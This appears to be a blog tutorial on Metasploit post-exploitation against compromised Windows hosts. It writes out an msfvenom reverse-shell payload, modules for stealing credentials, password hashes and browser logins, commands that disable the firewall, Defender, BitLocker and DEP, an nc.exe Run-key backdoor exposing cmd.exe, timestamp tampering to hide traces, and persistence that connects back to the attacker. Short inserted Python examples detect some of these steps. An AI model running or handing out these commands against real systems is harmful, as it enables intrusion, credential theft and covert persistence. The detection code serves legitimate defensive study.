What to do after a Metasploit session comes online?

The post-exploitation stage expands on the results after control of the target operating system has been gained

First, construct a payload

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe

A machine has been found that executed my payload

Next, escalate to higher privileges.

View basic information

View system information


View user permissions


View network environment

run get_local_subnets

View kernel

uname -a

View version

cat /etc/issue

Information collection module

Some commonly used post modules

1. Determine whether the target machine is a virtual machine

 run post/windows/gather/checkvm

2. View the account and token of the target host

 run post/windows/gather/credentials/credential_collector

3. View the installed software of the target machine

 run post/windows/gather/enum_applications

4. Local privilege escalation test module

If the privileges obtained are not administrator/SYSTEM and you do not know whether a local privilege escalation vulnerability exists, you can test with the following module

run post/multi/recon/local_exploit_suggester

It automatically goes through every local exploit it can check and lists the ones that appear feasible.

5. View recently opened files

run post/windows/gather/dumplinks

6. Retrieve web application credentials saved in the Firefox browser

Assuming the target system has Firefox installed and passwords are set to be saved in the browser

run post/multi/gather/firefox_creds

7. View saved SSH credentials

 run post/multi/gather/ssh_creds

8. Check whether a program on the system is malware. For example:

 run post/multi/gather/check_malware REMOTEFILE=c:\\a.exe

9. Collect password hashes on the system (administrator privileges required)

run post/windows/gather/smart_hashdump

10. View the login user of the target machine

run post/windows/gather/enum_logged_on_users

11. Collect the target machine's login credentials

run post/windows/gather/credentials/credential_collector

12. View the partition of the target machine

run post/windows/gather/forensics/enum_drives

13. Get browser cache files

run post/windows/gather/enum_ie

Information collection scripts

The collected target machine information is downloaded locally

run winenum

run scraper

General operation

For more command operations, please see the article [1]

Get system permission


Get user password hash

Obtain the user names and password hashes of the system accounts


Get machine online time


Target host file search

search command

For example, search for all .ini files on the host

 search -f *.ini

Searching the whole machine can take a long time, and an observant user may notice the hard disk working constantly, so search within a specified directory instead. For example:

search -d "c:\\documents and settings\\administrator\\desktop\\" -f *.pdf

Mimikatz extension

SYSTEM privileges are required

load mimikatz 

After loading, the new commands are as follows:

The commands above relate to system accounts. mimikatz_command -f has no help output, but the usage can be learned from its error messages

View system operation services

mimikatz_command -f service::list

View system processes

 mimikatz_command -f process::list

Further command hints can be obtained from the error messages

Turn off firewall

Prerequisite: a shell with administrator privileges on the target host has already been obtained through the vulnerability

Use the following command to turn off the firewall


netsh advfirewall set allprofiles state off

Check: it has been turned off successfully

Further, stop Windows Defender (the WinDefend service)

 net stop windefend  //net stop is used to stop a Windows service

To view service status on Windows, press Win+R and run services.msc

Add a firewall policy

First open a command prompt

execute -f cmd -i -H   //Open the shell interactively with the window hidden

View firewall status

netsh firewall show opmode

Add an allow policy

 netsh firewall add portopening TCP 4444 "test" ENABLE ALL
  //The rule name "test" can be set to something inconspicuous so that it blends in with the existing firewall policy

Kill antivirus software

In the meterpreter session, enter

run killav

You can also use the post module directly

run post/windows/manage/killav
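From the defender's side, the commands in the firewall and antivirus sections above leave traces in the Windows event logs: 4950 (a firewall setting changed) and 4946 (an exception rule was added) in the Security log, and 7036 (a service entered the stopped state) from the Service Control Manager in the System log. The following Python is an added example, not code from the original post or from Metasploit. The event records are a constructed, simplified representation (field names follow the wording of the event descriptions, not a real EVTX export), the watched service list and the five-minute window are assumed tuning values. It maps each event to an alert and escalates when several high-severity alerts cluster inside the window, which is the "turn everything off" pattern the sections above produce.

```python
from datetime import datetime, timedelta

# Constructed, simplified event records. Field names follow the wording of the event
# descriptions (Setting Type / Setting Value for 4950, Rule Name for 4946, the two
# message parameters of 7036); this is not a real EVTX export.
SAMPLE_EVENTS = [
    {"time": "2021-11-26T03:40:10", "id": 4624, "channel": "Security",
     "fields": {"TargetUserName": "alice"}},
    {"time": "2021-11-26T03:50:02", "id": 4950, "channel": "Security",
     "fields": {"Profile": "All", "SettingType": "Enable Windows Firewall", "SettingValue": "No"}},
    {"time": "2021-11-26T03:50:40", "id": 7036, "channel": "System",
     "fields": {"param1": "Windows Defender Antivirus Service", "param2": "stopped"}},
    {"time": "2021-11-26T03:51:15", "id": 4946, "channel": "Security",
     "fields": {"Profile": "All", "RuleName": "test", "RuleId": "{CONSTRUCTED-RULE-ID}"}},
    {"time": "2021-11-26T09:12:00", "id": 7036, "channel": "System",
     "fields": {"param1": "Print Spooler", "param2": "stopped"}},
]

# Display names of the services whose stop deserves an alert (assumed list for this host).
WATCHED_SERVICES = {"Windows Defender Antivirus Service", "Windows Defender Firewall"}


def classify(event):
    """Map one event record to (severity, detail), or None if it is not interesting."""
    f = event["fields"]
    if event["id"] == 4950 and f.get("SettingType") == "Enable Windows Firewall" \
            and f.get("SettingValue") == "No":
        return "high", "firewall disabled for profile: " + f.get("Profile", "?")
    if event["id"] == 4946:
        return "medium", "firewall exception rule added: " + f.get("RuleName", "?")
    if event["id"] == 7036 and f.get("param2") == "stopped" \
            and f.get("param1") in WATCHED_SERVICES:
        return "high", "protection service stopped: " + f["param1"]
    return None


def detect(events, window=timedelta(minutes=5)):
    """Return (alerts, burst): the per-event alerts and whether two or more
    high-severity alerts fell within `window` of each other."""
    alerts = []
    for ev in events:
        hit = classify(ev)
        if hit is not None:
            alerts.append({"time": datetime.fromisoformat(ev["time"]),
                           "severity": hit[0], "detail": hit[1]})
    highs = sorted(a["time"] for a in alerts if a["severity"] == "high")
    burst = any(later - earlier <= window for earlier, later in zip(highs, highs[1:]))
    return alerts, burst


if __name__ == "__main__":
    found, burst = detect(SAMPLE_EVENTS)
    for a in found:
        print(a["time"].isoformat(), a["severity"].upper(), a["detail"])
    print("defense-evasion burst:", burst)
```

The Print Spooler stop is deliberately left unflagged: a service-stop rule that fires on every service is noise, so the rule keys on the protection services only, and the correlation step is what turns three medium-confidence events into one high-confidence finding.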

Turn on Remote Desktop Services

 run post/windows/manage/enable_rdp

Or use the built-in script

Turn on Remote Desktop Services

 run getgui -e

Add remote desktop user and password

 run getgui -u user -p pass

Grab screen


Or use plug-ins

load espia  //Load the espia extension
screengrab  //Capture the screen

Registry operation


For example: we have obtained a meterpreter session on the target host. By modifying the registry, the nc.exe uploaded to the host is run every time the host starts, which makes it convenient to keep watching the host.

1. Upload nc.exe to the target host

 upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32   //Transferred to the system directory

2. Check the contents of the registry that follow the host startup by default

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run  //reg is a built-in meterpreter command for viewing and modifying the registry

3. Add a key value

 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
 // setval adds or modifies a value
 // -Ldp: L listens, d runs in the background, p gives the port
 // In summary, a value named nc is added to the Run key; it runs nc.exe from the system directory, which listens on port 444 in the background and hands cmd.exe to whoever connects.

After execution, verify that the value was inserted successfully.

You can also use the following command

 reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
 // queryval queries a single value
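As an added defensive counterpart (example code written for this page, not from the original post or from Metasploit), the following Python audits the same Run key from the administrator's side. It parses the text that reg query prints for HKLM\...\Run (the sample output, the baseline of expected autostart images and the value named nc are all constructed here) and flags values whose image is not in the baseline or whose command line launches cmd.exe or powershell.exe, which is exactly what the nc entry above does.

```python
import ntpath
import re
import shlex

# Constructed sample of what `reg query HKLM\...\Run` prints on a host; not real output.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe
"""

# Hypothetical baseline of autostart images known on this host (in practice taken from a golden image).
BASELINE_IMAGES = {"securityhealthsystray.exe", "vmtoolsd.exe"}

# An autostart entry has no business handing a command line to another shell.
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}

# One value line: indent, value name (may contain spaces), REG_* type, data.
ENTRY_RE = re.compile(r"^\s+(.+?)\s+(REG_\w+)\s+(.*)$")


def parse_run_entries(text):
    """Return (value_name, reg_type, data) for every value line of reg query output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group(1), m.group(2), m.group(3).strip()))
    return entries


def split_command(data):
    """Split a Windows command line; posix=False keeps backslashes literal and
    respects quoted paths, then the surrounding quotes are dropped."""
    return [tok.strip('"') for tok in shlex.split(data, posix=False)]


def audit_run_entries(text, baseline=BASELINE_IMAGES):
    """Flag Run values whose image is unknown or whose arguments launch a shell."""
    findings = []
    for name, _reg_type, data in parse_run_entries(text):
        tokens = split_command(data)
        if not tokens:
            continue
        image = ntpath.basename(tokens[0]).lower()
        reasons = []
        if image not in baseline:
            reasons.append("image not in baseline")
        spawned = {ntpath.basename(t).lower() for t in tokens[1:]} & SHELL_IMAGES
        if spawned:
            reasons.append("launches " + ", ".join(sorted(spawned)))
        if reasons:
            findings.append({"value": name, "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_entries(SAMPLE_REG_QUERY):
        print(f["value"], f["image"], "; ".join(f["reasons"]))
```

The baseline check catches an unknown binary regardless of its name, and the shell check catches a known binary being abused to launch cmd.exe, so an entry has to pass both to stay quiet; the same parser works on the output of reg query for the HKCU Run key and the RunOnce keys, since the line format is identical.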

Additional registry references [2]

Disk encryption

BitLocker disk encryption. Some computers have their disks encrypted and sealed; BitLocker is one such mechanism, built into Windows.

Turn off disk encryption on the target host:

 manage-bde -off C:

To view disk encryption status:

manage-bde -status C:

Close DEP

DEP (Data Execution Prevention) is a hardware-backed CPU protection technology. Disabling DEP makes the target's defenses much easier to break. You can use the following command

 bcdedit.exe /set {current} nx AlwaysOff

File access time modification

Operating on files on the target system leaves file times behind: creation time, modification time and change time. As the names suggest, a system administrator can use these three times to check whether and when a file was changed and judge whether the system has been compromised.

For penetration testing we naturally want to erase the traces of changes. Use stat <filename> to view the details of a file's times.

timestomp is the meterpreter command for viewing and modifying a file's times. View a file's specific times:

 timestomp -v 1.txt

Compared with the stat command it additionally shows Entry Modified: 2020-07-22 22:51:39 -0400

Copy the MAC times of another file onto this file

 timestomp -f c:\\autoexec.bat 1.txt

Parameters for modifying specific times

 -m  //Modify the Modified time
 -a  //Modify the Accessed time
 -c  //Modify the Created time
 -e  //Modify the Entry Modified time
 -z  //Modify all four times

For example:

 timestomp -z "MM/DD/YYYY HH24:MI:SS"  2.txt
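A note from the forensics side, with an added example that is not part of the original post: the format timestomp accepts above, MM/DD/YYYY HH24:MI:SS, has no sub-second component, while NTFS stores file times with 100 ns resolution, so a file whose four times all fall on a whole second deserves a second look; a modification time earlier than the creation time is another common hint, though it is normal for a copied file. The Python below applies these heuristics to constructed timestamp sets (the sample files and the reference "now" are made up) and includes a helper for building the same dict from the nanosecond fields of os.stat.

```python
from datetime import datetime, timedelta

FOUR_TIMES = ("modified", "accessed", "created", "entry_modified")


def timestamp_anomalies(times, now):
    """Return the reasons a file's four NTFS-style times look tampered with.

    times: dict mapping the names in FOUR_TIMES to naive datetimes with their
           sub-second part intact (see from_ns).
    now:   reference clock, used to spot times in the future.
    """
    reasons = []
    values = [times[k] for k in FOUR_TIMES]
    # Heuristic 1: a time written from a "MM/DD/YYYY HH24:MI:SS" string is a whole
    # second; times written by the OS almost always carry a non-zero fraction.
    if all(t.microsecond == 0 for t in values):
        reasons.append("all four timestamps are whole seconds")
    # Heuristic 2: content modified before the file existed. Expected for a copied
    # file (copy keeps the old modified time), odd for a file written in place.
    if times["modified"] < times["created"]:
        reasons.append("modified earlier than created")
    # Heuristic 3: nothing can legitimately be stamped later than the current clock.
    if any(t > now for t in values):
        reasons.append("timestamp lies in the future")
    return reasons


def from_ns(modified_ns, accessed_ns, created_ns, entry_modified_ns):
    """Build the times dict from nanosecond epoch values such as os.stat's
    st_mtime_ns / st_atime_ns / st_birthtime_ns / st_ctime_ns, keeping the
    fraction exact down to the microsecond (datetime's resolution)."""
    def conv(ns):
        return datetime.fromtimestamp(ns // 10**9) + timedelta(microseconds=(ns % 10**9) // 1000)
    return dict(zip(FOUR_TIMES, map(conv, (modified_ns, accessed_ns, created_ns, entry_modified_ns))))


# Constructed reference clock for the checks below.
NOW = datetime(2021, 11, 26, 3, 50, 26)

# Constructed: a file written normally by the OS, fractions of a second intact.
GENUINE = {
    "modified": datetime(2021, 11, 20, 9, 15, 3, 482913),
    "accessed": datetime(2021, 11, 25, 18, 2, 44, 10077),
    "created": datetime(2021, 11, 20, 9, 15, 3, 120554),
    "entry_modified": datetime(2021, 11, 25, 18, 2, 44, 10077),
}

# Constructed: the same kind of file after all four times were set from a
# seconds-only string (the -z form shown above).
STOMPED = {k: datetime(2020, 7, 22, 22, 51, 39) for k in FOUR_TIMES}

# Constructed: only the modified time was pushed back (the -m form), so the
# fractions on the other three times survive but the ordering no longer makes sense.
BACKDATED_MTIME = dict(GENUINE, modified=datetime(2020, 1, 1, 0, 0, 0))


if __name__ == "__main__":
    for label, sample in (("genuine", GENUINE), ("stomped", STOMPED), ("backdated", BACKDATED_MTIME)):
        print(label, timestamp_anomalies(sample, NOW) or ["no anomalies"])
```

None of these heuristics is proof on its own: a freshly copied file trips the ordering check, and some archivers restore whole-second times, so they are triage signals that point at which files to compare against other evidence (the $FILE_NAME attribute, USN journal, backups) rather than verdicts.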


Payloads generally have advanced options; view them with show advanced.

Among them is the AutoRunScript parameter, which runs a script immediately after the payload executes.

For example:

set AutoRunScript migrate -n explorer.exe

This means that as soon as the shell is obtained, the process is migrated into explorer.exe, so the shell is not lost when the injected malicious exe is killed.

Or other scripts, for example, view the most recently opened files on the target host immediately

set AutoRunScript post/windows/gather/dumplinks

If there are two scripts in sequence, you can add a script that executes first in the InitialAutoRunScript option.

Modify hosts file

run hostsedit -e,www.baidu.com

Persistent back door

 run metsvc -A       // -r removes the service

This command creates a system process named metsvc.exe listening on port 31337 that starts at boot. The disadvantages are that the port cannot be configured and the name of the uploaded exe file cannot be changed.

Connect to the backdoor

 set PAYLOAD windows/metsvc_bind_tcp 
 set LPORT 31337 
 set RHOST

It hung for a long time without returning a shell; I estimate this module is no longer maintained


Parameter options of the persistence script

-A  Automatically start a matching exploit/multi/handler to receive the connection
-S  Install as a system service process
-X  Start automatically when the system boots
-i  Interval in seconds between connection attempts once the agent is running
-p  Port to connect back to
-r  IP address to connect back to, i.e. the Kali machine's address


 run persistence -X -i 10 -p 4444 -r 
 run persistence -U -i 20 -p 4444 -r 
 run persistence -S -i 20 -p 4444 -r

reference material

[1] General operation details: https://blog.csdn.net/Yu_csdnstory/article/details/107441171

[2] Additional registry details: https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart

Posted on Fri, 26 Nov 2021 03:50:26 -0500 by forcom